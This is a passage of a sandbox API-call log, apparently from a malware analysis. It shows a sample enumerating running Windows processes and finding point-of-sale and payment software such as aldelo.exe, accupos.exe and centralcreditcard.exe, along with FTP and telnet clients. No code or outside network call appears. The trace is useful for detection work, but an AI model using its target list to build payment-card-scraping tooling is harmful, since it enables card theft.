hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0163.181] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0163.183] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0163.229] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0163.232] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0163.233] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0163.235] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0163.239] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0163.241] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0163.243] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0163.245] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0163.247] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0163.249] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0163.252] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0163.255] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0163.257] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0163.261] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0163.263] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0163.266] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0163.275] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0163.278] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1398, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0163.280] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0163.283] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0163.286] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0163.288] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 0 [0163.291] CloseHandle (hObject=0x1be0) returned 1 [0163.291] Sleep (dwMilliseconds=0x64) [0163.395] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1cec [0163.409] Process32First (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0163.411] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0163.413] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0163.414] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0163.416] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0163.418] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0163.419] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0163.421] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0163.422] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0163.424] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.426] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.427] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0163.429] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.503] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.505] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.507] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.509] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.511] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.513] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.515] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0163.517] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0163.519] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0163.521] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0163.522] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.524] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0163.525] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0163.527] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0163.529] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0163.531] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0163.533] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0163.535] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.536] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0163.583] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0163.586] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0163.588] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0163.590] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.592] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0163.595] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0163.597] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0163.599] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0163.602] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0163.604] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0163.606] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0163.609] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0163.611] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0163.613] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0163.615] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0163.617] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0163.622] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0163.624] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0163.626] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0163.629] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0163.631] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0163.633] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0163.634] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0163.638] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0163.641] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0163.643] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0163.645] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 